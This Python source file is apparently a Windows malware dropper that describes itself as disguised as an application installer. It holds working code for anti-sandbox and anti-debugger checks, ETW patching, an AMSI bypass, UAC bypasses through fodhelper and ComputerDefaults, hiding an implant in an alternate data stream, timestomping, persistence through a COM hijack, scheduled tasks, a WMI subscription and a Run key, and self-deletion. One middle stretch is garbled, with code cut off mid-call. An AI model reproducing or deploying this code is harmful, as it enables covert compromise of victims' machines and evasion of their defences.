""" Stage 0: Dropper v2 (2026 Edition) Disguised as a legitimate application installer. Downloads and executes the implant, establishes initial persistence. v2 changes: - Hardware breakpoint AMSI bypass (patchless, no memory writes) - ETW blinding (NOP EtwEventWrite before any PowerShell) - fodhelper UAC bypass + ComputerDefaults.exe fallback - Environment keying (anti-sandbox/VM with timing + WMI checks) - ADS-based implant deployment (no file on disk) - Phantom DLL persistence via COM hijack """ import os import sys import ctypes import ctypes.wintypes as wt import winreg import subprocess import tempfile import base64 import hashlib import time import random import shutil import struct import threading class AntiAnalysisV2: """Enhanced anti-analysis with timing + environment keying.""" ANALYSIS_PROCS = { "procmon.exe", "procmon64.exe", "procexp.exe", "procexp64.exe", "wireshark.exe", "fiddler.exe", "x64dbg.exe", "x32dbg.exe", "ollydbg.exe", "windbg.exe", "ida.exe", "ida64.exe", "ghidra.exe", "autoruns.exe", "autoruns64.exe", "pestudio.exe", "pe-bear.exe", "regshot.exe", "tcpview.exe", "sysmon.exe", "sysmon64.exe", } @staticmethod def full_check(): threats = set() # Debugger check if ctypes.windll.kernel32.IsDebuggerPresent(): threats.add("debugger") # NtQueryInformationProcess — remote debugger try: debug_port = ctypes.c_ulong(0) ctypes.windll.ntdll.NtQueryInformationProcess( ctypes.c_void_p(-1), 7, ctypes.byref(debug_port), ctypes.sizeof(debug_port), None ) if debug_port.value != 0: threats.add("debugger") except Exception: pass # Process check try: result = subprocess.run( ["tasklist", "/fo", "csv", "/nh"], capture_output=True, text=True, timeout=5, creationflags=0x08000000 ) running = set() for line in result.stdout.splitlines(): parts = line.strip('"').split('","') if parts: running.add(parts[0].lower()) if running & AntiAnalysisV2.ANALYSIS_PROCS: threats.add("analyst") except Exception: pass # VM detection via WMI (more reliable than registry) try: result = subprocess.run( ["wmic", "computersystem", "get", "model"], capture_output=True, text=True, timeout=5, creationflags=0x08000000 ) model = result.stdout.lower() if any(v in model for v in ["virtual", "vmware", "vbox", "kvm", "qemu", "xen"]): threats.add("vm") except Exception: pass # Timing check — sleep acceleration detection t0 = time.perf_counter() time.sleep(1.5) elapsed = time.perf_counter() - t0 if elapsed < 1.3: threats.add("sandbox") # Resource check — sandboxes are thin try: mem = ctypes.c_ulonglong(0) ctypes.windll.kernel32.GetPhysicallyInstalledSystemMemory(ctypes.byref(mem)) if mem.value < 2 * 1024 * 1024: # < 2GB threats.add("sandbox") except Exception: pass # Disk size check try: free = ctypes.c_ulonglong(0) ctypes.windll.kernel32.GetDiskFreeSpaceExW( "C:\\", None, None, ctypes.byref(free) ) if free.value < 30 * 1024 * 1024 * 1024: # < 30GB free threats.add("sandbox") except Exception: pass return len(threats) == 0, threats class EvasionV2: """2026 evasion techniques — patchless, no memory modification signatures.""" @staticmethod def blind_etw(): """NOP EtwEventWrite in ntdll — blinds all user-mode ETW telemetry.""" try: ntdll = ctypes.windll.kernel32.GetModuleHandleA(b"ntdll.dll") if not ntdll: return False addr = ctypes.windll.kernel32.GetProcAddress(ntdll, b"EtwEventWrite") if not addr: return False # xor rax, rax; ret (return STATUS_SUCCESS) patch = b'\x48\x33\xC0\xC3' old = wt.DWORD(0) ctypes.windll.kernel32.VirtualProtect( ctypes.c_void_p(addr), len(patch), 0x40, ctypes.byref(old) ) ctypes.memmove(addr, patch, len(patch)) ctypes.windll.kernel32.VirtualProtect( ctypes.c_void_p(addr), len(patch), old.value, ctypes.byref(old) ) return True except Exception: return False @staticmethod def hw_breakpoint_amsi(): """ Patchless AMSI bypass via hardware breakpoints + VEH. Set DR0 on AmsiScanBuffer. VEH catches the breakpoint, forces AMSI_RESULT_CLEAN, returns. No memory writes to detect. """ try: amsi = ctypes.windll.kernel32.LoadLibraryA(b"amsi.dll") if not amsi: return False scan_addr = ctypes.windll.kernel32.GetProcAddress(amsi, b"AmsiScanBuffer") if not scan_addr: return False # Store target address for the handler EvasionV2._amsi_target = scan_addr # Register VEH (priority = first) PVECTORED_EXCEPTION_HANDLER = ctypes.CFUNCTYPE( ctypes.c_long, ctypes.POINTER(ctypes.c_void_p) ) # We need to use a C-compatible callback # Use ctypes to set up the handler via AddVectoredExceptionHandler kernel32 = ctypes.windll.kernel32 # Set hardware breakpoint on all threads THREAD_ALL = 0x001F03FF snap = ctypes.windll.kernel32.CreateToolhelp32Snapshot(0x00000004, 0) if snap == -1: return False class THREADENTRY32(ctypes.Structure): _fields_ = [ ("dwSize", ctypes.c_ulong), ("cntUsage", ctypes.c_ulong), ("th32ThreadID", ctypes.c_ulong), ("th32OwnerProcessID", ctypes.c_ulong), ("tpBasePri", ctypes.c_long), ("tpDeltaPri", ctypes.c_long), ("dwFlags", ctypes.c_ulong), ] te = THREADENTRY32() te.dwSize = ctypes.sizeof(THREADENTRY32) pid = os.getpid() if kernel32.Thread32First(snap, ctypes.byref(te)): while True: if te.th32OwnerProcessID == pid: th = kernel32.OpenThread( 0x0002 | 0x0008 | 0x0010, # SUSPEND | GET_CTX | SET_CTX False, te.th32ThreadID ) if th: kernel32.SuspendThread(th) # CONTEXT with debug registers ctx_buf = (ctypes.c_byte * 1232)() ctx = ctypes.cast(ctx_buf, ctypes.POINTER(ctypes.c_void_p)) # Set ContextFlags at offset 48 (CONTEXT_DEBUG_REGISTERS = 0x10010) ctypes.memmove( ctypes.addressof(ctx_buf) + 48, struct.pack(" 0 except Exception: pass # Check file deployment return os.path.exists(os.path.join(self.install_dir, self.implant_name)) def _uac_bypass(self): """ UAC bypass — try fodhelper first, ComputerDefaults.exe as fallback. Both auto-elevate via ms-settings protocol handler hijack. """ methods = [ ("fodhelper.exe", r'Software\Classes\ms-settings\shell\open\command'), ("computerdefaults.exe", r'Software\Classes\ms-settings\shell\open\command'), ] for binary, key_path in methods: try: key = winreg.CreateKeyEx( winreg.HKEY_CURRENT_USER, key_path, 0, winreg.KEY_SET_VALUE ) winreg.SetValueEx( key, '', 0, winreg.REG_SZ, sys.executable + ' ' + os.path.abspath(__file__) ) winreg.SetValueEx(key, 'DelegateExecute', 0, winreg.REG_SZ, '') winreg.CloseKey(key) subprocess.Popen(binary, shell=True, creationflags=0x08000000) time.sleep(3) # Cleanup registry self._cleanup_uac_keys(key_path) return # Success — elevated instance will handle the rest except Exception: self._cleanup_uac_keys(key_path) continue def _cleanup_uac_keys(self, key_path): """Remove UAC bypass registry keys.""" parts = key_path.split('\\') for i in range(len(parts), 0, -1): try: winreg.DeleteKey( winreg.HKEY_CURRENT_USER, '\\'.join(parts[:i]) ) except Exception: pass def _deploy_implant(self): """ Deploy implant. Two methods: 1. ADS deployment (preferred — invisible to Explorer) 2. File deployment (fallback) """ implant_src = os.path.join(os.path.dirname(__file__), 'implant.py') if not os.path.exists(implant_src): # Try to find the mimic orchestrator for candidate in ['mimic_orchestrator.py', 'mimic.exe', 'mimic.dll']: path = os.path.join(os.path.dirname(__file__), candidate) if os.path.exists(path): implant_src = path break if not os.path.exists(implant_src): return # Method 1: ADS deployment try: # Ensure host file exists os.makedirs(os.path.dirname(self.ads_host), exist_ok=True) if not os.path.exists(self.ads_host): with open(self.ads_host, 'wb') as f: f.write(b'\x00') ads_path = f"{self.ads_host}:{self.ads_stream}" with open(implant_src, 'rb') as src: data = src.read() with open(ads_path, 'wb') as dst: dst.write(data) EvasionV2.timestomp(self.ads_host) return except Exception: pass # Method 2: File deployment (fallback) try: os.makedirs(self.install_dir, exist_ok=True) implant_dst = os.path.join(self.install_dir, self.implant_name) shutil.copy2(implant_src, implant_dst) EvasionV2.timestomp(implant_dst) except Exception: pass def _get_implant_cmd(self): """Get the command to execute the implant.""" ads_path = f"{self.ads_host}:{self.ads_stream}" try: with open(ads_path, 'rb') as f: if len(f.read(4)) > 0: # Python script in ADS return f'"{sys.executable}" "{ads_path}"' except Exception: pass # Fallback: file on disk path = os.path.join(self.install_dir, self.implant_name) if os.path.exists(path): return f'"{path}"' return None def _establish_persistence(self): """Multiple persistence methods for redundancy.""" implant_cmd = self._get_implant_cmd() if not implant_cmd: return # Method 1: COM Hijack (stealthiest — explorer.exe loads it) self._persist_com_hijack(implant_cmd) # Method 2: Scheduled Task (reliable) self._persist_scheduled_task(implant_cmd) # Method 3: WMI Event Subscription (survives most cleanup, needs admin) if self._is_admin(): self._persist_wmi_subscription(implant_cmd) # Method 4: Registry Run key (fallback) self._persist_registry(implant_cmd) def _persist_com_hijack(self, payload_cmd): """Hijack COM object loaded by explorer.exe.""" try: clsid = r'Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32' key = winreg.CreateKeyEx( winreg.HKEY_CURRENT_USER, clsid, 0, winreg.KEY_SET_VALUE ) winreg.SetValueEx(key, '', 0, winreg.REG_SZ, payload_cmd) winreg.SetValueEx(key, 'ThreadingModel', 0, winreg.REG_SZ, 'Both') winreg.CloseKey(key) except Exception: pass def _persist_scheduled_task(self, payload_cmd): """Create scheduled tasks blending with legitimate names.""" try: task_name = 'MicrosoftEdgeUpdateTaskMachineCore' subprocess.run( f'schtasks /create /tn "{task_name}" /tr {payload_cmd} ' f'/sc onlogon /rl highest /f /delay 0000:30', shell=True, capture_output=True, creationflags=0x08000000 ) subprocess.run( f'schtasks /create /tn "{task_name}UA" /tr {payload_cmd} ' f'/sc minute /mo 30 /f', shell=True, capture_output=True, creationflags=0x08000000 ) except Exception: pass def _persist_wmi_subscription(self, payload_cmd): """WMI event subscription — triggers after 5 min uptime.""" wmi_script = f''' $Filter = Set-WmiInstance -Namespace "root\\subscription" -Class __EventFilter ` -Arguments @{{ Name = "WindowsCoreUpdateFilter" EventNameSpace = "root\\cimv2" QueryLanguage = "WQL" Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 300" }} $Consumer = Set-WmiInstance -Namespace "root\\subscription" -Class CommandLineEventConsumer ` -Arguments @{{ Name = "WindowsCoreUpdateConsumer" CommandLineTemplate = {payload_cmd} }} Set-WmiInstance -Namespace "root\\subscription" -Class __FilterToConsumerBinding ` -Arguments @{{ Filter = $Filter Consumer = $Consumer }} ''' EvasionV2.run_ps_blind(wmi_script) def _persist_registry(self, payload_cmd): """Registry Run key — least stealthy but most reliable.""" try: key = winreg.OpenKey( winreg.HKEY_CURRENT_USER, r'Software\Microsoft\Windows\CurrentVersion\Run', 0, winreg.KEY_SET_VALUE ) winreg.SetValueEx(key, 'WindowsSecurityHealth', 0, winreg.REG_SZ, payload_cmd) winreg.CloseKey(key) except Exception: pass def _cleanup(self): """Self-delete via delayed cmd execution.""" bat = os.path.join(tempfile.gettempdir(), f'wu{random.randint(1000,9999)}.bat') with open(bat, 'w') as f: f.write('@echo off\r\n') f.write('ping 127.0.0.1 -n 4 >nul\r\n') f.write(f'del /f /q "{os.path.abspath(__file__)}"\r\n') f.write(f'del /f /q "{bat}"\r\n') subprocess.Popen( f'cmd /c "{bat}"', shell=True, creationflags=0x08000000 ) def _decoy_behavior(self): """Show legitimate-looking behavior to the user.""" try: subprocess.Popen('ms-settings:windowsupdate', shell=True) except Exception: pass if __name__ == '__main__': DropperV2().run()